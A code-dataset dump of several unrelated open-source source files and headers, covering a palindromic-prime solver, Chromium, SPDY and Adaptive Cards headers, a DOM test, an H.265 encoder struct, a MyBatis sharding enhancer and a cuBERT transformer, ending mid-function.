#define FOR(i, a, b) for (int i=a; i<b; i++)
#define F0R(i, a) for (int i=0; i<a; i++)
#define FORd(i,a,b) for (int i = (b)-1; i >= a; i--)
#define F0Rd(i,a) for (int i = (a)-1; i >= 0; i--)
#define mp make_pair
#define pb push_back
#define f first
#define s second
#define lb lower_bound
#define ub upper_bound
const int MOD = 1000000007;
double PI = 4*atan(1);
vi ans,primes;
void genprimes() {
FOR(i,2,10001) {
bool f = 1;
for (int j: primes) {
if (i%j == 0) {
f = 0;
break;
}
if (j*j>i) break;
}
if (f) primes.pb(i);
}
}
int isprime(int k) {
for (int i: primes) {
if (k % i == 0 && k != i) return 0;
if (i*i>k) return 1;
}
return 1;
}
int rev(int k) {
string z = to_string(k);
reverse(z.begin(),z.end());
return stoi(z);
}
int main() {
//ifstream cin ("pprime.in");
//ofstream cout ("pprime.out");
genprimes();
int a,b; cin >> a >> b;
FOR(i,1,9) {
if (i % 2 == 0) {
FOR(j,pow(10,i/2-1),pow(10,i/2)) {
int t = pow(10,i/2)*j+rev(j);
if (isprime(t) && t >= a && t <= b)
cout << t << "\n";
}
} else {
FOR(j,pow(10,i/2-1),pow(10,i/2)) F0R(z,10) {
int t = pow(10,i/2+1)*j+pow(10,i/2)*z+rev(j);
if (isprime(t) && t >= a && t <= b)
cout << t << "\n";
}
}
}
}
| 875 |
2,151 | <reponame>zipated/src
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
#define ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
#include <memory>
#include "ash/wm/window_resizer.h"
#include "base/macros.h"
namespace ash {
// DragWindowResizer is a decorator of WindowResizer and adds the ability to
// drag windows across displays.
class DragWindowResizerMash : public WindowResizer {
public:
DragWindowResizerMash(std::unique_ptr<WindowResizer> next_window_resizer,
wm::WindowState* window_state);
~DragWindowResizerMash() override;
// WindowResizer:
void Drag(const gfx::Point& location, int event_flags) override;
void CompleteDrag() override;
void RevertDrag() override;
private:
std::unique_ptr<WindowResizer> next_window_resizer_;
DISALLOW_COPY_AND_ASSIGN(DragWindowResizerMash);
};
} // namespace ash
#endif // ASH_WM_DRAG_WINDOW_RESIZER_MASH_H_
| 380 |
634 | <reponame>vzsky/Algorithms
/*
Petar 'PetarV' Velickovic
Data Structure: Binary Indexed Tree
*/
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <iostream>
#include <vector>
#include <list>
#include <string>
#include <algorithm>
#include <queue>
#include <stack>
#include <set>
#include <map>
#include <complex>
#define MAX_N 1000001
using namespace std;
typedef long long lld;
int n;
int bit[MAX_N];
//Struktura za efikasno cuvanje kumulativnih suma
//Slozenost: O(log N) po operaciji
inline void update(int x, int val)
{
while (x <= n)
{
bit[x] += val;
x += (x & -x);
}
}
inline int read(int x)
{
int ret = 0;
while (x > 0)
{
ret += bit[x];
x -= (x & -x);
}
return ret;
}
int main()
{
n = 10;
update(1, 1);
update(3, 1);
update(5, 5);
update(2, -2);
update(5, -1);
printf("%d\n",read(6));
return 0;
}
| 438 |
478 | <gh_stars>100-1000
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
#pragma once
namespace AdaptiveCards::Rendering::Uwp::MediaHelpers
{
winrt::Image GetMediaPosterAsImage(winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveRenderArgs const& renderArgs,
winrt::AdaptiveMedia const& adaptiveMedia);
winrt::UIElement CreatePosterContainerWithPlayButton(winrt::Image const& posterImage,
winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveRenderArgs const& renderArgs);
std::tuple<winrt::Uri, winrt::hstring> GetMediaSource(winrt::AdaptiveHostConfig const& hostConfig,
winrt::AdaptiveMedia const& adaptiveMedia);
void HandleMediaClick(winrt::AdaptiveRenderContext const& renderContext,
winrt::AdaptiveMedia const& adaptiveMedia,
winrt::MediaElement const& mediaElement,
winrt::UIElement const& posterContainer,
winrt::Uri const& mediaSourceUrl,
winrt::hstring const& mimeType,
winrt::AdaptiveMediaEventInvoker const& mediaInvoker);
}
| 742 |
2,151 |
/*
This Java source file was generated by test-to-java.xsl
and is a derived work from the source document.
The source document contained the following notice:
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts.level1.core;
import org.w3c.dom.*;
import org.w3c.domts.DOMTestCase;
import org.w3c.domts.DOMTestDocumentBuilderFactory;
/**
* The "createEntityReference(name)" method creates an
* EntityReference node. In addition, if the referenced entity
* is known, the child list of the "EntityReference" node
* is the same as the corresponding "Entity" node.
*
* Retrieve the entire DOM document and invoke its
* "createEntityReference(name)" method. It should create
* a new EntityReference node for the Entity with the
* given name. The referenced entity is known, therefore the child
* list of the "EntityReference" node is the same as the corresponding
* "Entity" node.
* @author NIST
* @author <NAME>
* @see <a href="http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-392B75AE">http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-392B75AE</a>
*/
public final class documentcreateentityreferenceknown extends DOMTestCase {
/**
* Constructor.
* @param factory document factory, may not be null
* @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
*/
public documentcreateentityreferenceknown(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException {
super(factory);
//
// check if loaded documents are supported for content type
//
String contentType = getContentType();
preload(contentType, "staff", true);
}
/**
* Runs the test case.
* @throws Throwable Any uncaught exception causes test to fail
*/
public void runTest() throws Throwable {
Document doc;
EntityReference newEntRefNode;
NodeList newEntRefList;
Node child;
String name;
String value;
doc = (Document) load("staff", true);
newEntRefNode = doc.createEntityReference("ent3");
assertNotNull("createdEntRefNotNull", newEntRefNode);
newEntRefList = newEntRefNode.getChildNodes();
assertSize("size", 1, newEntRefList);
child = newEntRefNode.getFirstChild();
name = child.getNodeName();
assertEquals("name", "#text", name);
value = child.getNodeValue();
assertEquals("value", "Texas", value);
}
/**
* Gets URI that identifies the test.
* @return uri identifier of test
*/
public String getTargetURI() {
return "http://www.w3.org/2001/DOM-Test-Suite/level1/core/documentcreateentityreferenceknown";
}
/**
* Runs this test from the command line.
* @param args command line arguments
*/
public static void main(final String[] args) {
DOMTestCase.doMain(documentcreateentityreferenceknown.class, args);
}
}
| 1,156 |
312 | <filename>mpp/common/h265e_syntax_new.h
/*
* Copyright 2015 Rockchip Electronics Co. LTD
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef __H265E_SYNTAX_NEW_H__
#define __H265E_SYNTAX_NEW_H__
#include "mpp_rc.h"
#include "h265_syntax.h"
#include "rc.h"
typedef struct H265PicEntry_t {
RK_U8 slot_idx;
} H265ePicEntry;
typedef struct H265ePicParams_t {
RK_U16 pic_width;
RK_U16 pic_height;
RK_U16 hor_stride;
RK_U16 ver_stride;
RK_U16 pic_ofsty;
RK_U16 pic_oftx;
RK_U32 mpp_format;
union {
struct {
RK_U16 chroma_format_idc : 2;
RK_U16 separate_colour_plane_flag : 1;
RK_U16 bit_depth_luma_minus8 : 3;
RK_U16 bit_depth_chroma_minus8 : 3;
RK_U16 log2_max_pic_order_cnt_lsb_minus4 : 4;
RK_U16 NoPicReorderingFlag : 1;
RK_U16 NoBiPredFlag : 1;
RK_U16 ReservedBits1 : 1;
};
RK_U16 wFormatAndSequenceInfoFlags;
};
RK_U8 sps_max_dec_pic_buffering_minus1;
RK_U8 log2_min_luma_coding_block_size_minus3;
RK_U8 log2_diff_max_min_luma_coding_block_size;
RK_U8 log2_min_transform_block_size_minus2;
RK_U8 log2_diff_max_min_transform_block_size;
RK_U8 max_transform_hierarchy_depth_inter;
RK_U8 max_transform_hierarchy_depth_intra;
RK_U8 num_short_term_ref_pic_sets;
RK_U8 num_long_term_ref_pics_sps;
RK_U8 num_ref_idx_l0_default_active_minus1;
RK_U8 num_ref_idx_l1_default_active_minus1;
RK_S8 init_qp_minus26;
RK_U16 ReservedBits2;
union {
struct {
RK_U32 scaling_list_enabled_flag : 1;
RK_U32 amp_enabled_flag : 1;
RK_U32 sample_adaptive_offset_enabled_flag : 1;
RK_U32 pcm_enabled_flag : 1;
RK_U32 pcm_sample_bit_depth_luma_minus1 : 4;
RK_U32 pcm_sample_bit_depth_chroma_minus1 : 4;
RK_U32 log2_min_pcm_luma_coding_block_size_minus3 : 2;
RK_U32 log2_diff_max_min_pcm_luma_coding_block_size : 2;
RK_U32 pcm_loop_filter_disabled_flag : 1;
RK_U32 long_term_ref_pics_present_flag : 1;
RK_U32 sps_temporal_mvp_enabled_flag : 1;
RK_U32 strong_intra_smoothing_enabled_flag : 1;
RK_U32 dependent_slice_segments_enabled_flag : 1;
RK_U32 output_flag_present_flag : 1;
RK_U32 num_extra_slice_header_bits : 3;
RK_U32 sign_data_hiding_enabled_flag : 1;
RK_U32 cabac_init_present_flag : 1;
RK_U32 ReservedBits3 : 5;
};
RK_U32 CodingParamToolFlags;
};
union {
struct {
RK_U32 constrained_intra_pred_flag : 1;
RK_U32 transform_skip_enabled_flag : 1;
RK_U32 cu_qp_delta_enabled_flag : 1;
RK_U32 pps_slice_chroma_qp_offsets_present_flag : 1;
RK_U32 weighted_pred_flag : 1;
RK_U32 weighted_bipred_flag : 1;
RK_U32 transquant_bypass_enabled_flag : 1;
RK_U32 tiles_enabled_flag : 1;
RK_U32 entropy_coding_sync_enabled_flag : 1;
RK_U32 uniform_spacing_flag : 1;
RK_U32 loop_filter_across_tiles_enabled_flag : 1;
RK_U32 pps_loop_filter_across_slices_enabled_flag : 1;
RK_U32 deblocking_filter_override_enabled_flag : 1;
RK_U32 pps_deblocking_filter_disabled_flag : 1;
RK_U32 lists_modification_present_flag : 1;
RK_U32 slice_segment_header_extension_present_flag : 1;
RK_U32 ReservedBits4 : 16;
};
RK_U32 CodingSettingPicturePropertyFlags;
};
RK_S8 pps_cb_qp_offset;
RK_S8 pps_cr_qp_offset;
RK_U8 num_tile_columns_minus1;
RK_U8 num_tile_rows_minus1;
RK_S32 column_width_minus1[19];
RK_S32 row_height_minus1[21];
RK_U8 diff_cu_qp_delta_depth;
RK_S8 pps_beta_offset_div2;
RK_S8 pps_tc_offset_div2;
RK_U8 log2_parallel_merge_level_minus2;
RK_U32 vps_id;
RK_U32 pps_id;
RK_U32 sps_id;
RK_U8 scaling_list_data_present_flag;
} H265ePicParams;
typedef struct H265eSlicParams_t {
union {
struct {
RK_U32 sli_splt : 1;
RK_U32 sli_splt_mode : 1;
RK_U32 sli_splt_cpst : 1;
RK_U32 sli_flsh : 1;
RK_U32 cbc_init_flg : 1;
RK_U32 mvd_l1_zero_flg : 1;
RK_U32 merge_up_flag : 1;
RK_U32 merge_left_flag : 1;
RK_U32 ref_pic_lst_mdf_l0 : 1;
RK_U32 num_refidx_act_ovrd : 1;
RK_U32 sli_sao_chrm_flg : 1;
RK_U32 sli_sao_luma_flg : 1;
RK_U32 sli_tmprl_mvp_en : 1;
RK_U32 pic_out_flg : 1;
RK_U32 dpdnt_sli_seg_flg : 1;
RK_U32 no_out_pri_pic : 1;
RK_U32 sli_lp_fltr_acrs_sli : 1;
RK_U32 sli_dblk_fltr_dis : 1;
RK_U32 dblk_fltr_ovrd_flg : 1;
RK_U32 col_ref_idx : 1;
RK_U32 col_frm_l0_flg : 1;
RK_U32 st_ref_pic_flg : 1;
RK_U32 num_pos_pic : 1;
RK_U32 dlt_poc_msb_prsnt0 : 1;
RK_U32 dlt_poc_msb_prsnt1 : 1;
RK_U32 dlt_poc_msb_prsnt2 : 1;
RK_U32 used_by_lt_flg0 : 1;
RK_U32 used_by_lt_flg1 : 1;
RK_U32 used_by_lt_flg2 : 1;
RK_U32 ReservedBits : 3;
};
RK_U32 CodingSliceFlags;
};
H265ePicEntry recon_pic;
H265ePicEntry ref_pic;
RK_S8 sli_tc_ofst_div2;
RK_S8 sli_beta_ofst_div2;
RK_S8 sli_cb_qp_ofst;
RK_U8 sli_qp;
RK_U8 max_mrg_cnd;
RK_U8 lst_entry_l0;
RK_U8 num_refidx_l1_act;
RK_U8 num_refidx_l0_act;
RK_U8 slice_type;
RK_U8 slice_rsrv_flg;
RK_U8 sli_pps_id;
RK_U8 lt_idx_sps;
RK_U8 num_lt_pic;
RK_U8 st_ref_pic_idx;
RK_U8 num_lt_sps;
RK_U8 used_by_s0_flg;
RK_U8 num_neg_pic;
RK_U16 sli_poc_lsb;
RK_U16 sli_hdr_ext_len;
RK_U16 poc_lsb_lt0;
RK_U16 sli_max_num_m1;
RK_U16 sli_splt_cnum_m1;
RK_U16 dlt_poc_msb_cycl0;
RK_U16 dlt_poc_s0_m10;
RK_U16 dlt_poc_s0_m11;
RK_U16 dlt_poc_s0_m12;
RK_U16 dlt_poc_s0_m13;
RK_U16 poc_lsb_lt1;
RK_U16 poc_lsb_lt2;
RK_U16 dlt_poc_msb_cycl1;
RK_U16 dlt_poc_msb_cycl2;
RK_U32 sli_splt_byte;
RK_U32 tot_poc_num;
RK_U32 non_reference_flag;
} H265eSlicParams;
/*
* Split reference frame configure to two parts
* The first part is slice depended info like poc / frame_num, and frame
* type and flags.
* The other part is gop structure depended info like gop index, ref_status
* and ref_frm_index. This part is inited from dpb gop hierarchy info.
*/
typedef struct UserDatas_t {
void *plt_data;
} UserDatas;
typedef struct H265eSyntax_new_t {
RK_S32 idr_request;
H265ePicParams pp;
H265eSlicParams sp;
} H265eSyntax_new;
#ifdef __cplusplus
extern "C" {
#endif
RK_S32 h265e_syntax_fill(void *ctx);
#ifdef __cplusplus
}
#endif
#endif
| 5,155 |
679 | <filename>main/desktop/source/deployment/gui/dp_gui.h<gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
#if ! defined INCLUDED_DP_GUI_H
#define INCLUDED_DP_GUI_H
#include "dp_gui_updatedata.hxx"
#include "dp_misc.h"
#include "dp_gui.hrc"
#include "rtl/ref.hxx"
#include "rtl/instance.hxx"
#include "osl/thread.hxx"
#include "cppuhelper/implbase2.hxx"
#include "vcl/svapp.hxx"
#include "vcl/dialog.hxx"
#include "vcl/button.hxx"
#include "vcl/fixed.hxx"
#include "salhelper/simplereferenceobject.hxx"
#include "svtools/svtabbx.hxx"
#include "svtools/headbar.hxx"
#include "com/sun/star/ucb/XContentEventListener.hpp"
#include "osl/mutex.hxx"
#include <list>
#include <memory>
#include <queue>
namespace com { namespace sun { namespace star {
namespace container {
class XNameAccess;
}
namespace frame {
class XDesktop;
}
namespace awt {
class XWindow;
}
namespace uno {
class XComponentContext;
}
namespace deployment {
class XPackageManagerFactory;
}
} } }
namespace svt {
class FixedHyperlink;
}
namespace dp_gui {
enum PackageState { REGISTERED, NOT_REGISTERED, AMBIGUOUS, NOT_AVAILABLE };
//==============================================================================
class SelectedPackage: public salhelper::SimpleReferenceObject {
public:
SelectedPackage() {}
SelectedPackage( const ::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> &xPackage)
: m_xPackage( xPackage )
{}
virtual ~SelectedPackage();
::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> getPackage() const { return m_xPackage; }
private:
SelectedPackage(SelectedPackage &); // not defined
void operator =(SelectedPackage &); // not defined
::com::sun::star::uno::Reference< ::com::sun::star::deployment::XPackage> m_xPackage;
};
} // namespace dp_gui
#endif
| 918 |
2,151 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
#define NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
#include <stddef.h>
#include <stdint.h>
#include <map>
#include <memory>
#include "net/spdy/server_push_delegate.h"
#include "net/test/gtest_util.h"
#include "net/third_party/spdy/core/spdy_bug_tracker.h"
#include "net/third_party/spdy/core/spdy_header_block.h"
#include "net/third_party/spdy/core/spdy_headers_handler_interface.h"
#include "net/third_party/spdy/core/spdy_protocol.h"
#include "net/third_party/spdy/platform/api/spdy_string.h"
#include "net/third_party/spdy/platform/api/spdy_string_piece.h"
#define EXPECT_SPDY_BUG EXPECT_DFATAL
namespace spdy {
inline bool operator==(SpdyStringPiece x,
const SpdyHeaderBlock::ValueProxy& y) {
return x == y.as_string();
}
namespace test {
SpdyString HexDumpWithMarks(const unsigned char* data,
int length,
const bool* marks,
int mark_length);
void CompareCharArraysWithHexError(const SpdyString& description,
const unsigned char* actual,
const int actual_len,
const unsigned char* expected,
const int expected_len);
void SetFrameFlags(SpdySerializedFrame* frame, uint8_t flags);
void SetFrameLength(SpdySerializedFrame* frame, size_t length);
// A test implementation of SpdyHeadersHandlerInterface that correctly
// reconstructs multiple header values for the same name.
class TestHeadersHandler : public SpdyHeadersHandlerInterface {
public:
TestHeadersHandler() {}
void OnHeaderBlockStart() override;
void OnHeader(SpdyStringPiece name, SpdyStringPiece value) override;
void OnHeaderBlockEnd(size_t header_bytes_parsed,
size_t compressed_header_bytes_parsed) override;
const SpdyHeaderBlock& decoded_block() const { return block_; }
size_t header_bytes_parsed() const { return header_bytes_parsed_; }
size_t compressed_header_bytes_parsed() const {
return compressed_header_bytes_parsed_;
}
private:
SpdyHeaderBlock block_;
size_t header_bytes_parsed_ = 0;
size_t compressed_header_bytes_parsed_ = 0;
DISALLOW_COPY_AND_ASSIGN(TestHeadersHandler);
};
} // namespace test
} // namespace spdy
#endif // NET_THIRD_PARTY_SPDY_CORE_SPDY_TEST_UTILS_H_
| 1,094 |
770 | package com.mogujie.trade.tsharding.route.orm;
import com.mogujie.trade.tsharding.client.ShardingCaculator;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import javassist.bytecode.ClassFile;
import javassist.bytecode.ConstPool;
import org.apache.ibatis.mapping.MappedStatement;
import org.apache.ibatis.mapping.ResultMap;
import org.apache.ibatis.mapping.SqlSource;
import org.apache.ibatis.reflection.MetaObject;
import org.apache.ibatis.reflection.factory.DefaultObjectFactory;
import org.apache.ibatis.reflection.factory.ObjectFactory;
import org.apache.ibatis.reflection.wrapper.DefaultObjectWrapperFactory;
import org.apache.ibatis.reflection.wrapper.ObjectWrapperFactory;
import org.apache.ibatis.session.Configuration;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* 通用Mapper增强基类,扩展Mapper sql时需要继承该类
*
* @author qigong on 5/1/15
*/
public abstract class MapperEnhancer {
private static ClassPool pool = ClassPool.getDefault();
private Map<String, Method> methodMap = new HashMap<String, Method>();
private Class<?> mapperClass;
public MapperEnhancer(Class<?> mapperClass) {
this.mapperClass = mapperClass;
}
/**
* 代码增加方法标记
*
* @param record
*/
public String enhancedShardingSQL(Object record) {
return "enhancedShardingSQL";
}
public MapperEnhancer() {
super();
}
/**
* 对mapper进行增强,生成新的mapper,并主动加载新mapper类到classloader
*
* @param mapperClassName
*/
public static void enhanceMapperClass(String mapperClassName) throws Exception {
Class originClass = Class.forName(mapperClassName);
Method[] originMethods = originClass.getDeclaredMethods();
CtClass cc = pool.get(mapperClassName);
for (CtMethod ctMethod : cc.getDeclaredMethods()) {
CtClass enhanceClass = pool.makeInterface(mapperClassName + "Sharding" + ctMethod.getName());
for (long i = 0L; i < 512; i++) {
CtMethod newMethod = new CtMethod(ctMethod.getReturnType(), ctMethod.getName() + ShardingCaculator.getNumberWithZeroSuffix(i), ctMethod.getParameterTypes(), enhanceClass);
Method method = getOriginMethod(newMethod, originMethods);
if(method.getParameterAnnotations()[0].length > 0) {
ClassFile ccFile = enhanceClass.getClassFile();
ConstPool constPool = ccFile.getConstPool();
//拷贝注解信息和注解内容,以支持mybatis mapper类的动态绑定
newMethod.getMethodInfo().addAttribute(MapperAnnotationEnhancer.duplicateParameterAnnotationsAttribute(constPool, method));
}
enhanceClass.addMethod(newMethod);
}
Class<?> loadThisClass = enhanceClass.toClass();
//2015.09.22后不再输出类到本地
// enhanceClass.writeFile(".");
}
}
private static Method getOriginMethod(CtMethod ctMethod, Method[] originMethods) {
for (Method method : originMethods) {
int len = ctMethod.getName().length();
if (ctMethod.getName().substring(0, len-4).equals(method.getName())) {
return method;
}
}
throw new RuntimeException("enhanceMapperClass find method error!");
}
/**
* 添加映射方法
*
* @param methodName
* @param method
*/
public void addMethodMap(String methodName, Method method) {
methodMap.put(methodName, method);
}
private static final ObjectFactory DEFAULT_OBJECT_FACTORY = new DefaultObjectFactory();
private static final ObjectWrapperFactory DEFAULT_OBJECT_WRAPPER_FACTORY = new DefaultObjectWrapperFactory();
/**
* 反射对象,增加对低版本Mybatis的支持
*
* @param object 反射对象
* @return
*/
public static MetaObject forObject(Object object) {
return MetaObject.forObject(object, DEFAULT_OBJECT_FACTORY, DEFAULT_OBJECT_WRAPPER_FACTORY);
}
/**
* 是否支持该通用方法
*
* @param msId
* @return
*/
public boolean supportMethod(String msId) {
Class<?> mapperClass = getMapperClass(msId);
if (this.mapperClass.isAssignableFrom(mapperClass)) {
String methodName = getMethodName(msId);
return methodMap.get(methodName) != null;
}
return false;
}
/**
* 重新设置SqlSource
*
* @param ms
* @param sqlSource
*/
protected void setSqlSource(MappedStatement ms, SqlSource sqlSource) {
MetaObject msObject = forObject(ms);
msObject.setValue("sqlSource", sqlSource);
}
/**
* 重新设置SqlSource
*
* @param ms
* @throws java.lang.reflect.InvocationTargetException
* @throws IllegalAccessException
*/
public void setSqlSource(MappedStatement ms, Configuration configuration) throws Exception {
Method method = methodMap.get(getMethodName(ms));
try {
if (method.getReturnType() == Void.TYPE) {
method.invoke(this, ms);
} else if (SqlSource.class.isAssignableFrom(method.getReturnType())) {
//代码增强 扩充为512个方法。
for (long i = 0; i < 512; i++) {
//新的带sharding的sql
SqlSource sqlSource = (SqlSource) method.invoke(this, ms, configuration, i);
String newMsId = ms.getId() + ShardingCaculator.getNumberWithZeroSuffix(i);
newMsId = newMsId.replace("Mapper.", "MapperSharding" + getMethodName(ms) + ".");
//添加到ms库中
MappedStatement newMs = copyFromMappedStatement(ms, sqlSource, newMsId);
configuration.addMappedStatement(newMs);
setSqlSource(newMs, sqlSource);
}
} else {
throw new RuntimeException("自定义Mapper方法返回类型错误,可选的返回类型为void和SqlNode!");
}
} catch (IllegalAccessException e) {
throw new RuntimeException(e);
} catch (InvocationTargetException e) {
throw new RuntimeException(e.getTargetException() != null ? e.getTargetException() : e);
}
}
protected MappedStatement copyFromMappedStatement(MappedStatement ms,
SqlSource newSqlSource, String newMsId) {
MappedStatement.Builder builder = new MappedStatement.Builder(ms.getConfiguration(), newMsId, newSqlSource, ms.getSqlCommandType());
builder.resource(ms.getResource());
builder.fetchSize(ms.getFetchSize());
builder.statementType(ms.getStatementType());
builder.keyGenerator(ms.getKeyGenerator());
// setStatementTimeout()
builder.timeout(ms.getTimeout());
// setParameterMap()
builder.parameterMap(ms.getParameterMap());
// setStatementResultMap()
List<ResultMap> resultMaps = ms.getResultMaps();
builder.resultMaps(resultMaps);
builder.resultSetType(ms.getResultSetType());
// setStatementCache()
builder.cache(ms.getCache());
builder.flushCacheRequired(ms.isFlushCacheRequired());
builder.useCache(ms.isUseCache());
return builder.build();
}
/**
* 根据msId获取接口类
*
* @param msId
* @return
* @throws ClassNotFoundException
*/
public static Class<?> getMapperClass(String msId) {
String mapperClassStr = msId.substring(0, msId.lastIndexOf("."));
try {
return Class.forName(mapperClassStr);
} catch (ClassNotFoundException e) {
throw new RuntimeException("无法获取Mapper接口信息:" + msId);
}
}
/**
* 获取执行的方法名
*
* @param ms
* @return
*/
public static String getMethodName(MappedStatement ms) {
return getMethodName(ms.getId());
}
/**
* 获取执行的方法名
*
* @param msId
* @return
*/
public static String getMethodName(String msId) {
return msId.substring(msId.lastIndexOf(".") + 1);
}
}
| 3,784 |
423 | <gh_stars>100-1000
from typing import Any, Collection, Union
from ..constants.ignore import ignore_vars
from ..models.heap_object import HeapObject
from ..models.options import Options
from ..models.unique_identifier import UniqueIdentifier
from ..helpers.dictionary import filter_dict
from .base_heap_object_factory import HeapObjectFactory
class ClassHeapObjectFactory(HeapObjectFactory):
def __init__(self, obj: Any, options: Options = None) -> None:
super().__init__(obj, options)
self._dict = filter_dict(self._object.__dict__, ignore_vars)
def get_type(self) -> str:
return '({0}) class'.format(self.get_value())
def get_value(self) -> str:
return self._object.__name__
def get_objects_to_reduce(self) -> Union[None, Collection[Any]]:
return self._dict.values()
def create(self) -> HeapObject:
heap_obj = HeapObject(self.get_id(), self.get_type(), self.get_value(), 'kvp')
heap_obj.immutable = False
heap_obj.references = {k: UniqueIdentifier(HeapObjectFactory.get_object_id(v))
for k, v in self._dict.items()}
return heap_obj
| 445 |
486 | #include <string>
#include "cuBERT/common.h"
#include "Transformer.h"
namespace cuBERT {
template <typename T>
Transformer<T>::Transformer(void* cublas,
const std::string &var_prefix,
const std::unordered_map<std::string, T *> &var,
size_t max_batch_size,
size_t seq_length,
size_t hidden_size,
size_t num_hidden_layers,
size_t num_attention_heads,
size_t intermediate_size)
: attention_self(num_hidden_layers),
attention_output_dense(num_hidden_layers),
attention_output_norm(num_hidden_layers),
intermediate_dense(num_hidden_layers),
intermediate_act_fn(num_hidden_layers),
output_dense(num_hidden_layers),
output_layer_norm(num_hidden_layers),
attention_heads(num_hidden_layers),
attention_output(num_hidden_layers),
intermediate_output(num_hidden_layers),
layer_output(num_hidden_layers) {
this->cublas = cublas;
this->num_hidden_layers = num_hidden_layers;
this->seq_length = seq_length;
this->intermediate_size = intermediate_size;
size_t attention_head_size = hidden_size / num_attention_heads;
this->attention_mask = new AttentionMask<T >(cublas, seq_length, num_attention_heads, max_batch_size);
this->neg_attention_mask_buffer = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * num_attention_heads * seq_length * seq_length));
for (int layer_idx = 0; layer_idx < num_hidden_layers; ++layer_idx) {
// buffers
this->attention_heads[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
this->attention_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
this->intermediate_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * intermediate_size));
this->layer_output[layer_idx] = static_cast<T *>(cuBERT::malloc(sizeof(T) * max_batch_size * seq_length * hidden_size));
attention_self[layer_idx] = new AttentionSelf<T>(cublas,
var_prefix + "/layer_" + std::to_string(layer_idx) +
"/attention/self",
var,
max_batch_size,
seq_length,
attention_heads[layer_idx],
hidden_size, num_attention_heads, attention_head_size);
T *attention_output_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/dense/kernel");
T *attention_output_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/dense/bias");
attention_output_dense[layer_idx] = new Dense<T>(cublas,
hidden_size, hidden_size,
attention_output_dense_kernel, attention_output_dense_bias,
max_batch_size * seq_length,
gemm_algo<T>("GEMM_ALGO_ATTENTION"));
T *attention_output_norm_beta = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/LayerNorm/beta");
T *attention_output_norm_gamma = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/attention/output/LayerNorm/gamma");
attention_output_norm[layer_idx] = new LayerNorm<T>(max_batch_size * seq_length, hidden_size,
attention_output_norm_beta, attention_output_norm_gamma);
// inputs = hidden_size
// units = intermediate_size
// max_batch_size = max_batch_size * seq_length
T *intermediate_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/intermediate/dense/kernel");
T *intermediate_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/intermediate/dense/bias");
intermediate_dense[layer_idx] = new Dense<T>(cublas,
hidden_size, intermediate_size,
intermediate_dense_kernel, intermediate_dense_bias,
max_batch_size * seq_length,
gemm_algo<T>("GEMM_ALGO_INTERMEDIATE"));
intermediate_act_fn[layer_idx] = new GELU<T>();
// inputs = intermediate_size
// units = hidden_size
// max_batch_size = max_batch_size * seq_length
T *output_dense_kernel = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/dense/kernel");
T *output_dense_bias = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/dense/bias");
output_dense[layer_idx] = new Dense<T>(cublas,
intermediate_size, hidden_size,
output_dense_kernel, output_dense_bias,
max_batch_size * seq_length,
